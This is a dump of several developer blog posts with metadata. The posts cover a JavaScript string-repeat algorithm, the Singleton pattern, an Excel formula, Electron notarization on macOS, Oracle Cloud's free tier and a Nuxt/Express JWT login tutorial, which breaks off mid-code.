754,382 | Implementing String repeat() function in JS | As per MDN, The repeat() method constructs and returns a new string which contains the specified... | 13,507 | 2021-07-09T06:00:08 | https://blog.lakbychance.com/implementing-string-repeat-function-in-js | javascript, algorithms, computerscience | As per [MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/repeat),
> The `repeat()` method constructs and returns a new string which contains the specified number of copies of the string on which it was called, concatenated together.
Now one might think that there is a really straightforward to implement this. Yes there is but if asked in an interview and you go with the straightforward way, they will be like :-

How do I know this ?
Because I got **mehhhhd......**
So that's why we are going to see few approaches to solve it. The real optimized approach was not intuitive to me and is still something I am trying to wrap my head around. But I came up with a middle-ground approach that works better than the **meh!!** one.
And once, again we will take a synonym for `repeat`.
**Google time** !!!!

`replicate` sounds cool.

Alright let's go implement `String.prototype.replicate` now :-
### The Meh Approach
```js
String.prototype.replicate = function(count) {
let input = this;
let result = "";
for (let index = 0; index < count; index++) {
result += input;
}
return result;
}
```
**Meh explanation :-**
We initialize `result` to `""` and start a `for` loop in which we iterate till `count` and simply keep appending the `input` to the `result` variable. Very straightforward but **meh!!**.
**Meh benchmark :-**

100% slower with 108 operations per second compared to 9202566.4 operations per second. Let me cry in the corner.

### The Little Less Meh Approach
```js
String.prototype.replicate = function(count) {
let input = this;
let result = this.valueOf();
for (var index = 2; index < count; index*=2) {
result += result;
}
let remainingCount = count - index/2;
return remainingCount > 0 ? result + input.replicate(remainingCount) : result;
}
```
**Little Less Meh explanation :-**
* Let's consider the case of `'hey'.replicate(10)` :-
* We have `input` initialized to `this` and `result` initialized to `this.valueOf()`. The `valueOf()` bit helps in decreasing the implicit conversion time that's happening whenever later `result` will be concatenated to itself.
* Now the `for` loop stuff -
* `index` is intialized to `2`.
* `index` should be less than `count`
* `index` should be multiplied each time by `2`
* `result` will be appended to itself each time in the iteration:-
* `result` for `index = 2` will become `heyhey`
* `result` for `index = 4` will become `heyheyheyhey`
* `result` for `index = 8` will become `heyheyheyheyheyheyheyhey`
* `index` will become `16` which is greater than `10` and we exit the loop.
* `remainingCount` will be `10` - `16/2` = `2`;
* When `remainingCount` will be greater than `0`, we will recurse by calling `input.replicate(remainingCount)` and add its result to current `result` or simply return `result`.
**Little Less Meh benchmark :-**

76.79% slower with 2109699.5 operations per second compared to 9091332.85 operations per second. That's still relatively slower than the native one but way way way faster than what we had initially.

Earlier performing the repetitions itself was **O(count)** but now the same is somewhere down the line of **O(log(x)+log(y) +....+log(k))** but not completely **O(log(count))**.
In `'hey'.replicate(10)` scenario :-
* First time, **O(log(8))** work is done and then in next recursive step **O(log(2))** i.e `O(log(8) + log(2))`. And if I am doing maths correct,
`log(a) + log(b) = log(ab)`
That means `O(log(8) + log(2))` is `O(log(16))` which is greater than `O(log(10))`(the optimal solution).
### The legendary optimal [solution](https://stackoverflow.com/a/5450113/8130690) I would have never landed upon without the internet
```js
String.prototype.replicate = function(count) {
let result = ''
let pattern = this.valueOf();
while (count > 0) {
if (count & 1)
result += pattern;
count >>= 1
if (count) pattern += pattern;
}
return result;
};
```
**Noob explanation :-**
I am still trying to understand the intuition behind this solution but I think it's to do with the fact that every number can be represented in a binary form. So let's say `count` is **5** then it can be represented as `101` in binary. So it's possible for us to repeat the string `count` times by just resorting to **binary calculations**. If we try to differentiate between **4** and **5**, we know there is an extra **1** in latter case. Now instead of seeing the above code as some **binary work of art**, replace **count&1** by **count%2!==0** and **count>>=1** by **count=Math.floor(count/2)**. What this means is that, whenever `count` is odd, we would want to save the `pattern` till now in `result` variable. What is `pattern` ? `pattern` is repeated concatenation of itself similar to our earlier algorithm so it will always repeat in powers of 2. It's necessary to take care of the situation when `count` is **not divisible by 2** and store the current `pattern` in `result` as we go until `count` becomes 0.
Did you expect a better explanation ? I can't give it right now since I am a **noob** in binary land. But maybe somewhere in a parallel universe I invented this Algo and helped Brendan Eich get rid of `typeof null` -> `object` 🤷♂️.
**Best benchmark yet :-**

Still 29% slower ? WTH. But hey, I ain't competing with JavaScript engines here.
### The Bonus MDN [polyfill](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/repeat)
```js
String.prototype.replicate = function(count) {
var str = '' + this;
count = +count;
count = Math.floor(count);
if (str.length == 0 || count == 0)
return '';
var maxCount = str.length * count;
count = Math.floor(Math.log(count) / Math.log(2));
while (count) {
str += str;
count--;
}
str += str.substring(0, maxCount - str.length);
return str;
}
```
Expected an explanation ? I don't care and you will see why 👇
**The mandatory benchmark :-**

99.94 % slower with 5211.6 operations per second compared to 8344361.29 operations per second. And there is definite reason why it is even slower than what I came up with. What I think is happening is that upto a **power of 2** which is less than `count`, we use the same ideology as in the optimal solution for concatenating and doubling length of `str` every time. But after that for the remaining length, it uses `substring` and appends that to `str` again. It's the second step of `substring` which makes it a costly operation. Though it does better than the initial **Meh** solution of **108** ops/s, it's still no where near around the best optimal solution I found online or even mine 😎.
**MDN : 0**
**Lakshya : 1**
JK. The site is and hopefully remains a gold mine ❤️.
Here are the overall benchmarks :-

Have something to add on ? Feel free to

### Thank you for your time :D | lakbychance |
754,449 | Design Patterns: Singleton | This week on design patterns, we have the Singleton. It's the last creational design pattern that... | 12,869 | 2021-07-29T07:13:56 | https://dev.to/tamerlang/design-patterns-singleton-36di | computerscience, beginners, programming, architecture | This week on design patterns, we have the Singleton.
It's the last creational design pattern that we will cover.
Today you will learn:
- Understand the core concepts of the Singleton pattern.
- Understand why the Singleton pattern is considered an anti-pattern.
- Recognize opportunities to use the Singleton pattern.
- Understand the pros and cons of the Singleton pattern.
## Definition

> In software engineering, the singleton pattern is a software design pattern that restricts the instantiation of a class to one "single" instance. — Wikipedia
In a nutshell, the Singleton Pattern:
- **Ensures that a class only has a single instance**
But why would we want to have only a single instance of a class?
There might be many different use-cases, but the most common would be the ability to access some shared resource - a database or file.
In essence, if you created an object, and then wanted to create a new one. You would not get a fresh object instead, get the old one you created.
Keep in mind that this behaviour is almost impossible to implement in the regular constructor since it must **always** return a new object.
- **Provide global access to that instance**
Basically, we would want our instance to be accessible anywhere in the code base, that's why we make that instance globally accessible. This also protects our instance from being overwritten by other objects.
However, this may be very unsafe, due to the instance being global.
This is one of the reasons why critics consider the Singleton Pattern an Antipattern.
### What is an Antipattern?

At the beginning of the series we have defined the design pattern, they are basically a common solution to a recurring problem.
On the other hand, an Antipattern is a common solution to a recurring problem **THAT** has negative consequences in the long run.
Antipatterns aren't specifically software related, they can be managerial problems or even architectural problems.
In our case, the Singleton pattern is considered to be an Antipattern due to the fact:
- Tightly couples your code to a Singleton.
- Introduced lot's of complexity if your application is multi-threaded.
- They are hard to test because they are global.
**BUT** in the right environment and implementation, Singletons can be a good option.
## Implementation
There are different ways to implement a Singleton, but they all these two steps:
- Make your constructor private to prevent other objects from creating new instances of the Singleton class.
- Create a public static creation method to return a new or recurring instance. Under the hood, it checks whether the class already has an instance or not, and acts appropriately.
Here's a naive example using JavaScript:
```jsx
class Singleton {
private static instance;
private constructor() {]
public function getInstance(){
if (!Singleton.instance) {
Singleton.instance = new Singleton();
}
return Singleton.instance;
}
}
```
## When to use this pattern?
**Use the Singleton pattern when you only want a single instance of a class**, this may be a database or some logger object that would be shared across your program.
The Singleton Pattern disables all other means of creating another instance of a class, which guarantees that the instance is either a newly created one or an existing one.
## Pros
- You can be sure that a class only has a single instance.
- You have global access to that single instance.
- The Singleton object is only initialized when it's requested the first time.
## Cons
- Violates the Single Responsibility Principle. The pattern solves two problems at the time.
- Your code gets coupled to the Singleton.
- Get's very complex in multi-threaded applications.
- It's hard to unit test because it's gonna be hard to mock the Singleton due to its constructor being private.
## Conclusion
The Singleton pattern is a controversial one, some say it's good other's say it's bad.
It depends actually, in some rare use-cases it can be very useful, and now you have this pattern in your toolbox.
**Today you learned:**
- Core concepts of the Singleton pattern
- Its basic implementation
- Its pros and cons
## Further Readings
If you want to learn more about the design patterns, I would recommend [Diving into Design Patterns](https://refactoring.guru/design-patterns). It explains all 23 design patterns found in the GoF book, in a fun and engaging manner.
Another book that I recommend is [Heads First Design Patterns: A Brain-Friendly Guide](https://www.amazon.com/Head-First-Design-Patterns-Brain-Friendly/dp/0596007124), which has fun and easy-to-read explanations. | tamerlang |
754,558 | Excel Formulas to Find the First Column Number in a Range ~ Easily!! | So far we have learned the formulas to find the address of the first cell in Excel. Likewise, here we... | 0 | 2021-07-13T03:22:29 | https://geekexcel.com/excel-formulas-to-find-the-first-column-number-in-a-range/ | excelformula, excelformulas | ---
title: Excel Formulas to Find the First Column Number in a Range ~ Easily!!
published: true
date: 2021-07-09 08:19:25 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-find-the-first-column-number-in-a-range/
---
So far we have learned the formulas to find the **[address of the first cell in Excel](https://geekexcel.com/excel-formulas-to-find-the-address-of-first-cell-in-a-range/)**. Likewise, here we will show the formulas to **find the first column number in a range in Excel**. Let’s see them below!! Get an official version of ** MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
[](https://geekexcel.com/excel-formulas-to-find-the-first-column-number-in-a-range/the-first-column-number-in-a-range/#main)<figcaption id="caption-attachment-48764">The first column number in a range</figcaption>
## Generic Formula:
- If you want to return the first column number, you can use the below formula.
**=[MIN](https://geekexcel.com/how-to-use-excel-min-function-in-office-365-with-examples/)([COLUMN](https://geekexcel.com/use-column-function-in-microsoft-excel-365-simple-methods/)(range))**
## Syntax Explanations:
- **MIN** – In Excel, the [**MIN function**](https://geekexcel.com/how-to-use-excel-min-function-in-office-365-with-examples/) will return the smallest numeric value from the range of input values.
- **COLUMN** – This function is used to return column numbers for reference. Read more on the **[COLUMN Function](https://geekexcel.com/use-column-function-in-microsoft-excel-365-simple-methods/)**.
- **Range** – It represents the input range.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Parenthesis ()** – The main purpose of this symbol is to group the elements.
## Practical Example:
Let’s consider the below example image.
- Here we will enter the input values in **Column B** , and **Column C**.
- Now we are going to first column number in a range.
<figcaption id="caption-attachment-48759">Input Ranges</figcaption>
- Select any cell and type the above-given formula.
<figcaption id="caption-attachment-48757">Enter the formula</figcaption>
- Finally, press **ENTER** key, you can get the result as shown below.
<figcaption id="caption-attachment-48760">Result</figcaption>
## Closure:
In this chapter, we have described the simple formulas to **get the first column number** (i.e. the starting column number) in a range in Excel. Hope that this article is useful to you. Leave a **comment** or **reply** below let me know what you think!
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)!! **If you want to learn more helpful formulas, check out [**Excel Formulas**](https://geekexcel.com/excel-formula/) **!! **
### Read Ahead:
- **[Excel Formulas to Find First Match between Two Ranges ~ Quick Tricks!!](https://geekexcel.com/excel-formulas-to-find-first-match-between-two-ranges/)**
- **[How to Insert a Date or Formatted Date in Excel Office 365?](https://geekexcel.com/how-to-insert-a-date-or-formatted-date-in-excel-office-365/)**
- **[Excel Formulas to Add Row Numbers and Skip Blanks ~ Simple Guide!!](https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/)**
- **[Excel Formulas to Find the Last Cell Address in a Range ~ Quick Tricks!!](https://geekexcel.com/excel-formulas-find-last-cell-address/)**
| excelgeek |
754,585 | Starting a YouTube Channel for Programming Tutorials! | I have created a YouTube Channel in Which I will be Uploading Tutorials Related to the Programming... | 0 | 2021-07-09T10:16:31 | https://dev.to/abdurrkhalid333/starting-a-youtube-channel-for-programming-tutorials-5gmf | webdev, productivity, html, showdev | I have created a YouTube Channel in Which I will be Uploading Tutorials Related to the Programming and Web Development.
YouTube Channel Link:
[Learn To Code](https://www.youtube.com/channel/UChtr70R5H_ziehe_YjtOJtw 'Learn To Code')
If You Use Facebook then it will be a good option to like the Page so that you can get Notification Regarding Next Tutorial Updates.
[Learn To Code on Facebook](https://www.facebook.com/LearnToBeProgrammer/ 'Learn to Code Facebook Page')
Any Kind of Suggestions are Welcome.
Have a Happy Week-End Ahead.
| abdurrkhalid333 |
754,607 | Making notarization work on macOS for Electron apps built with Electron Builder | I ❤️ building things and, when it comes to software, I’ve done that for quite a few platforms and in... | 0 | 2021-07-09T12:45:12 | https://christarnowski.com/making-notarization-work-on-macos-for-electron-apps-built-with-electron-builder | development, electron, node | I ❤️ building things and, when it comes to software, I’ve done that for quite a few platforms and in various programming languages over the years. Recently I’ve been developing a desktop app built with Electron and I must say the whole first-timer experience has been rather pleasing. One thing that required “a bit” of attention was the build process for different platforms (Windows, macOS) and part of it was the app notarization step on macOS. What on paper looked like a really easy thing to do, took me a couple of hours and a lot of detective work to get it right 🕵️♀️.
Below is a **step by step guide on how to set up notarization on macOS** when using [Electron Builder](http://electron.build) (22.7.0) and [Electron Notarize](https://github.com/electron/electron-notarize) (1.0.0), including a complete workaround for an issue I’ve experienced that has to do with Apple Notarization Service. Hopefully, I will be able to help you out like a true superhero 🦸🏻♂️, so your time and effort can be devoted to other, more pressing matters 🦾.
## A bit of context
Want the solution right away 🧐? Skip to the step by step guide.
Why even bother with notarization in the first place? Well, on macOS (and Windows for that matter) there are various security mechanisms built into the operating system to prevent malicious software from being installed and run on a machine. macOS and Windows both require installers and binaries to be cryptographically signed with a valid certificate. On macOS, however, there is an additional build-time notarization step that involves sending a compressed .app archive to Apple’s Notarization Service (ANS) for verification.
In most instances, the whole process is painless, but in my case, i.e. an Electron app with a lot of dependencies and third-party binaries, not so much 🤕. It turns out the ANS expects the ZIP archive of .app package to be compressed using the PKZIP 2.0 scheme, while the default zip utility, shipped with macOS and used by Electron Notarize, features version 3.0 of the generic ZIP algorithm. There are some notable differences between the two and to see what I mean, try manually signing `.app`, then compressing it using:
1. Command-line `zip` utility,
2. “Compress” option found in Finder,
And submitting it for notarization from the command line. The Finder-created archive will pass, while zip-one will fail.
The `zipinfo` command line tool reveals that:
* Finder uses PKZIP 2.0 scheme, while `zip` version 3.0 of the generic ZIP algorithm.
* Finder compresses all the files in .app as binaries, while “zip” treats files according to the content type (code as text, binaries as binaries).
* Finder includes magical `__MACOSX` folders to embed macOS-specific attributes into the archive, especially for links to dynamic libraries (e.g. found in some Node modules).
One way of getting around the above issue is to use `ditto` instead of `zip` to create a compressed archive of an `.app` package. [Ditto](https://ss64.com/osx/ditto.htm) is a command line tool shipped with macOS for copying directories and creating/extracting archives. It uses the same scheme as Finder (PKZIP) and preserves metadata, thus making the output compatible with Apple’s service. The relevant options for executing `ditto` in this context, i.e. to mimic Finder’s behavior, are:
* `-c` and `-k` to create a PKZIP-compressed archive,
* `—sequesterRsrc` to preserve metadata (`__MACOSX`),
* `—keepParent` to embed parent directory name source in the archive.
The complete invocation looks as follows:
```
ditto -c -k —sequesterRsrc —keepParent APP_NAME.app APP_NAME.app.zip
```
To apply this to Electron Builder’s notarization flow, you need to monkey patch Electron Notarize’s .app and make the compress step use “ditto”. This can be done via “afterSign” hook defined in the Electron Builder’s configuration file.
You can learn in an [follow up essay](https://christarnowski.com/blog/making-notarization-work-on-macos-for-electron-apps-built-with-electron-builder) why I chose this particular approach. Hope you love it!
## Setting up macOS app notarization, including workaround
Before you start, you first need to properly configure [code signing](https://developer.apple.com/developer-id), as per the [official documentation of Electron Builder](https://www.electron.build/code-signing) and various guides¹. For completeness sake I’ve included here all the steps required for making the notarization to work based on my experience and excellent work by other developers¹.
1. [Create an app-specific password](https://support.apple.com/en-us/HT204397) to use with Apple notarization service. Preferably using your organization’s developer Apple ID.
2. Create an Entitlements `.plist` file specific to your Electron apps. In our case, the following did the trick (`entitlements.mac.plist`):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<!-- https://github.com/electron/electron-notarize#prerequisites -->
<key>com.apple.security.cs.allow-jit</key>
<true/>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key>
<true/>
<!-- https://github.com/electron-userland/electron-builder/issues/3940 -->
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
</dict>
</plist>
```
3. Set `entitlements` and `entitlementInherit` options for macOS build in Electron Builder’s configuration file to the `.plist` created in the previous step.
4. Create a `notarize.js` script to execute after Electron Builder signs the `.app` and its contents. Place the file in the build directory defined in Electron Builder’s configuration file.
```javascript
const {notarize} = require("electron-notarize");
exports.default = async function notarizing(context) {
const {electronPlatformName, appOutDir} = context;
if (electronPlatformName !== "darwin") {
return;
}
const appName = context.packager.appInfo.productFilename;
return await notarize({
appBundleId: process.env.APP_BUNDLE_ID,
appPath: `${appOutDir}/${appName}.app`,
appleId: process.env.APPLE_ID,
appleIdPassword: process.env.APPLE_ID_PASSWORD,
});
};
```
5. Add `"afterSign": "./PATH_TO_NOTARIZE_JS_IN_BUILD_DIRECTORY”` to Electron Builder’s configuration file.
6. Monkey patch Electron Notarize. The script should run before Electron Builder’s CLI command. In our case, since we’ve taken a very modular approach to general app architecture, the build scripts (TypeScript files) include a separate `commons` module, which is imported by Electron Notarize patcher. The `.ts` files can be executed using `ts-node` via
```
ts-node -O {\"module\":\"CommonJS\"} scripts/patch-electron-notarize.ts
```
The patcher itself does one thing only, that is, it replaces the following piece of the code in `build/node_modules/electron-notarize/lib/index.js`:
```javascript
spawn('zip', ['-r', '-y', zipPath, path.basename(opts.appPath)]
```
with
```javascript
spawn('ditto', ['-c', '-k', '--sequesterRsrc', '--keepParent', path.basename(opts.appPath), zipPath]
```
Our code for the `commons` (`patcher-commons.ts`):
```typescript
import {promises as fsp} from "fs";
export type FileContentsTransformer = (content: string) => string;
export async function replaceFileContents(path: string, transformer: FileContentsTransformer) {
let fh: fsp.FileHandle | null = null;
let content: string = "";
try {
fh = await fsp.open(path, "r");
if (fh) {
content = (await fh.readFile()).toString();
}
} finally {
if (fh) {
await fh.close();
}
}
try {
fh = await fsp.open(path, "w");
if (fh) {
await fh.writeFile(transformer(content));
}
} finally {
if (fh) {
await fh.close();
}
}
}
```
and the patcher (`patch-electron-notarize.ts`):
```javascript
import {FileContentsTransformer, replaceFileContents} from "./common";
const ELECTRON_NOTARIZE_INDEX_PATH = "build/node_modules/electron-notarize/lib/index.js";
async function main() {
const transformer: FileContentsTransformer = (content: string) => {
return content.replace(
"spawn('zip', ['-r', '-y', zipPath, path.basename(opts.appPath)]",
"spawn('ditto', ['-c', '-k', '--sequesterRsrc', '--keepParent', path.basename(opts.appPath), zipPath]"
);
};
await replaceFileContents(ELECTRON_NOTARIZE_INDEX_PATH, transformer);
}
// noinspection JSIgnoredPromiseFromCall
main();
```
7. Set `APPLE_ID` and `APPLE_ID_PASSWORD` environment variables (the ones defined in Step 1) before running Electron Builder on your developer machine or in your CI environment. You can use Keychain on your local machine instead.
And that’s pretty much it. You can check out a [simple, working example](https://github.com/christarnowski/electron-builder-notarization-for-macos-example) to see how to put this all together. Now you can spend the extra time on something you enjoy doing 🏖!
## Three takeaways
1. **When stuck, look for the root cause in the least expected places**. In the case of my project, the compression step was the unexpected culprit.
2. **Be stubborn when a particular feature or bugfix is essential to a product’s success**. Here, the notarization was important and it took some time to get it right, but the end result is customers feeling safe when installing the software.
3. **Sometimes “working” is good enough**. I could develop a better solution, but that would take some precious time. I opted to focus on more pressing issues instead.
Feedback and questions are more than welcome, either in comments or on social media 🙂
Thanks a ton to Piotr Tomiak ([@PiotrTomiak](https://twitter.com/PiotrTomiak)) and Jakub Tomanik ([@jakub_tomanik](https://twitter.com/jakub_tomanik)) for reading drafts of this article.
## References
1. Relevant sources: https://medium.com/@TwitterArchiveEraser/notarize-electron-apps-7a5f988406db.
2. GitHub Gists of the complete code. | christarnowski |
754,624 | Oracle Cloud, Free (Almost) Forever. | Have you heard? Oracle has a Cloud service like AWS, Azure, or GCP. I certainly didn't know about... | 0 | 2021-07-10T14:24:45 | https://dev.to/muckitymuck/oracle-cloud-free-almost-forever-2odo | cloudskills, cloud, cloudnative | Have you heard? Oracle has a Cloud service like AWS, Azure, or GCP. I certainly didn't know about this. IBM apparently has an offering. The field is getting crowded.(Clouded?, Clowded?)
Why should you care? A quick job search for remote Oracle Cloud jobs brings in 2000+ results in Dice. That's more than any of the big 3 for remote only filter.

Clearly, there is demand even if they are the wallflower at the party.
How do they sweeten the deal? They have a Free tier which is dubbed Free Always. This includes some offerings for VM instances. Pretty sweet.
Check out this clever fella and how he scored an impressive VM:

There are restrictions on how to get one. Most are only 1 core and offer only small storage. But keep an eye out:

In addition, you get $300 credit to experiment. Also, a lot of deployments are automated. There is a Jenkins CI/CD rollout that goes super smooth:


What you end up with is a pretty neat dashboard with Terraform configs and settings already in place.

Speaking of Terraform, you are probably wondering what the free tier offering is summarily:

That's right. 2 VMs and Managed Terraform. If you were looking to add that to your resume this is damn good start. Devops is hot right now, so here is step one.
Oracle has some impressive offerings for as relatively unknown as they are. If you have spare cycles and want a free hobby machine hosted in the cloud, this is a generous opportunity.
| muckitymuck |
754,663 | Developing Next-gen WordPress Solutions That Drive Growth & Generate Revenue | Hire our developers today to build an intuitive and scalable solution that will automate and simplify... | 0 | 2021-07-09T12:36:20 | https://dev.to/vmjsoftware/developing-next-gen-wordpress-solutions-that-drive-growth-generate-revenue-2m13 | wordpress, wordpressdevelopment, wordpressagency, wordpressservices | Hire our developers today to build an intuitive and scalable solution that will automate and simplify your mundane tasks. Share with us your vision and we will be happy to help. | vmjsoftware |
754,704 | Nuxt.js 2 And Express.js Authentication with Auth Module and JWT | Hi, today we want to build an authentication app with Nuxt.js and Express.js, we'll focus on the... | 0 | 2021-07-09T14:17:06 | https://dev.to/mohammadali0120/nuxt-js-and-express-js-authentication-with-auth-module-and-jwt-26gp | nuxt, express, authmodule, jwt | Hi, today we want to build an authentication app with Nuxt.js and Express.js, we'll focus on the front-end, and nuxt auth module and we will make a `local` authentication.
I remember myself when i wanted to add authentication in the app and how I was stuck in it because I couldn't find a good resource for it.
so I decided to write this article for other people to use it and don't get in trouble like me
This article is made for full-stack developers and also front-end developers so if you're not a full-stack web developer don't worry I will explain everything that you can add authentication on your app
**This application does not support of Refresh token for back-end, it's supported for front-end but commented because back-end had not set it and if we set it on front-end it will produce an error, in other words for back-end is just all about Access token, if you want to have Refresh token too, please give attention to last lines of this post**
before the start I should say that you need to know about these technologies:
###### Vue & Nuxt.js
###### Express.js & Mongodb (If you want also implement API)
so let's start it
## Nuxt.js
1- make a new app with `npx create-nuxt-app front`
2- choose the Axios module when making new app (if you didn't don't worry we will install it later)
3- install nuxt module and the Axios if you didn't
`yarn add --exact @nuxtjs/auth-next`
`yarn add @nuxtjs/axios`
or with npm
`npm install --save-exact @nuxtjs/auth-next`
`npm install @nuxtjs/axios`
then add it on nuxt.config.js like below:
```javascript
{
modules: [
'@nuxtjs/axios',
'@nuxtjs/auth-next'
],
auth: {
// Options
}
}
```
now it's time to add options on auth module :
```javascript
auth: {
strategies: {
local: {
// scheme: "refresh",
token: {
property: "token", //property name that the Back-end sends for you as a access token for saving on localStorage and cookie of user browser
global: true,
required: true,
type: "Bearer"
},
user: {
property: "user",
autoFetch: true
},
// refreshToken: { // it sends request automatically when the access token expires, and its expire time has set on the Back-end and does not need to we set it here, because is useless
// property: "refresh_token", // property name that the Back-end sends for you as a refresh token for saving on localStorage and cookie of user browser
// data: "refresh_token", // data can be used to set the name of the property you want to send in the request.
// },
endpoints: {
login: { url: "/api/auth/login", method: "post" },
// refresh: { url: "/api/auth/refresh-token", method: "post" },
logout: false, // we don't have an endpoint for our logout in our API and we just remove the token from localstorage
user: { url: "/api/auth/user", method: "get" }
}
}
}
},
```
and here is the config for the Axios that I recommend to use it:
```javascript
axios: {
baseURL: "http://localhost:8080" // here set your API url
},
```
**Tip:** if your back-end project has implemented Refresh token you should uncomment the `refresh` endpoint and change it to the right endpoint which your back-end gave you and also you should uncomment these `refreshToken` object and also `scheme: refresh`
now we make some components:
`/components/Auth/Login/index.vue`
```javascript
<template>
<div>
<form @submit.prevent="login">
<div class="mb-3">
<label for="email" class="form-label">Email address</label>
<input
type="email"
class="form-control"
id="email"
v-model="loginData.email"
aria-describedby="emailHelp"
/>
</div>
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input
type="password"
v-model="loginData.password"
class="form-control"
id="password"
/>
</div>
<button type="submit" class="btn btn-primary w-100">login</button>
</form>
</div>
</template>
<script>
export default {
data() {
return {
loginData: {
email: "",
password: ""
}
};
},
methods: {
async login() {
try {
let response = await this.$auth.loginWith("local", {
data: this.loginData
});
this.$router.push("/");
console.log(response);
} catch (err) {
console.log(err);
}
}
}
};
</script>
<style></style>
```
`/components/Auth/Register/index.vue`
```javascript
<template>
<div>
<form @submit.prevent="register">
<div class="mb-3">
<label for="fullname" class="form-label">Full Name</label>
<input
type="text"
v-model="registerData.fullname"
class="form-control"
id="fullname"
/>
</div>
<div class="mb-3">
<label for="email" class="form-label">Email address</label>
<input
type="email"
class="form-control"
id="email"
v-model="registerData.email"
aria-describedby="emailHelp"
/>
</div>
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input
type="password"
v-model="registerData.password"
class="form-control"
id="password"
/>
</div>
<button type="submit" class="btn btn-primary w-100">Register</button>
</form>
</div>
</template>
<script>
export default {
data() {
return {
registerData: {
fullname: "",
email: "",
password: ""
}
};
},
methods: {
async register() {
try {
const user = await this.$axios.$post("/api/auth/signin", {
fullname: this.registerData.fullname,
email: this.registerData.email,
password: this.registerData.password
});
console.log(user);
} catch (err) {
console.log(err);
}
}
}
};
</script>
<style></style>
```
and
`/components/Home/index.vue`
```javascript
<template>
<div>
<h2>You're in home page</h2>
</div>
</template>
<script>
export default {};
</script>
<style></style>
```
and
`/components/User/index.vue`
```javascript
<template>
<div>
Hello dear <b style="color:red">{{ getUserInfo.fullname }}</b> you're in
profile page
<hr />
This is your information:
<br /><br />
<table class="table">
<thead>
<tr>
<th scope="col">ID</th>
<th scope="col">FullName</th>
<th scope="col">Email</th>
</tr>
</thead>
<tbody>
<tr>
<td>{{ getUserInfo.id }}</td>
<td>{{ getUserInfo.fullname }}</td>
<td>{{ getUserInfo.email }}</td>
</tr>
</tbody>
</table>
</div>
</template>
<script>
export default {
computed: {
getUserInfo() {
return this.$store.getters.getUserInfo;
}
}
};
</script>
<style></style>
```
and
`/components/Layouts/Header/index.vue`
```javascript
<template>
<div>
<nav class="navbar navbar-expand-lg navbar-light bg-light">
<div class="container-fluid">
<nuxt-link class="navbar-brand" to="/">Navbar</nuxt-link>
<button
class="navbar-toggler"
type="button"
data-bs-toggle="collapse"
data-bs-target="#navbarSupportedContent"
aria-controls="navbarSupportedContent"
aria-expanded="false"
aria-label="Toggle navigation"
>
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav me-auto mb-2 mb-lg-0">
<template v-if="!isAuthenticated">
<li class="nav-item">
<nuxt-link
class="nav-link active"
aria-current="page"
to="/auth/login"
>Login</nuxt-link
>
</li>
<li class="nav-item">
<nuxt-link
class="nav-link active"
aria-current="page"
to="/auth/register"
>Register</nuxt-link
>
</li>
</template>
<template v-else>
<li class="nav-item" @click="logout">
<nuxt-link class="nav-link active" aria-current="page" to="#"
>Logout</nuxt-link
>
</li>
<li>
<nuxt-link
class="nav-link active"
aria-current="page"
to="/profile"
>
Profile
</nuxt-link>
</li>
</template>
</ul>
</div>
</div>
</nav>
</div>
</template>
<script>
export default {
methods: {
async logout() {
await this.$auth.logout(); // this method will logout the user and make token to false on the local storage of the user browser
}
},
computed: {
isAuthenticated() {
return this.$store.getters.isAuthenticated; // it check if user isAuthenticated
}
}
};
</script>
<style></style>
```
and
`/layouts/default.vue`
```javascript
<template>
<div>
<layouts-header />
<div class="container">
<br />
<Nuxt />
</div>
</div>
</template>
<script>
export default {};
</script>
<style>
@import url("https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.0.2/css/bootstrap.min.css");
</style>
```
and
`/pages/index.vue`
```javascript
<template>
<div>
<home />
</div>
</template>
<script>
export default {};
</script>
```
and
`/pages/auth/login/index.vue`
```javascript
<template>
<div>
<auth-login />
</div>
</template>
<script>
export default {};
</script>
<style></style>
```
and
`/pages/auth/register/index.vue`
```javascript
<template>
<div>
<auth-register />
</div>
</template>
<script>
export default {};
</script>
<style></style>
```
and
`/pages/profile/index.vue`
```javascript
<template>
<div>
<user />
</div>
</template>
<script>
export default {
middleware: "isAuthenticated" // it will use `isAuthenticated` middleware
};
</script>
<style></style>
```
and a middleware for checking if user authenticated:
```javascript
export default function({ store, redirect }) {
if (!store.state.auth.loggedIn) {
return redirect("/auth/login");
}
}
```
and at last vuex store :
```javascript
export const getters = {
isAuthenticated(state) {
return state.auth.loggedIn; // auth object as default will be added in vuex state, when you initialize nuxt auth
},
getUserInfo(state) {
return state.auth.user;
}
};
```
## Express.js
That's was our nuxt codes and now its time to make our API:
first of all make a directory and enter this command on Terminal/Cmd and `npm init -y`
then `npm install express body-parser bcryptjs jsonwebtoken mongoose`
and then
`npm install --save-dev nodemon` it will add nodemon as a dev dependency
##### Cauation if `"main"` was like this `"main":"index.js"` on `package.json` file, change it to `"main": "app.js"`
now its time we create some files:
`nodemon.js root direcotry that you just made`
```javascript
{
"env": {
"MONGO_USER": "mohammadali", // your cluster name
"MONGO_PASS": "20212021", // your cluster password
"MONGO_DB": "auth" // your db name
}
}
```
`on package.json will be on root directory add these lines of codes on scripts like as I did in below`
```javascript
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"start-server": "node app.js",
"dev": "nodemon app.js"
},
```
`app.js on root direcotry that you just made`
```javascript
const express = require("express");
const bodyParser = require("body-parser");
const mongoose = require("mongoose");
// routes
const authRouter = require("./routes/authRouter");
const app = express();
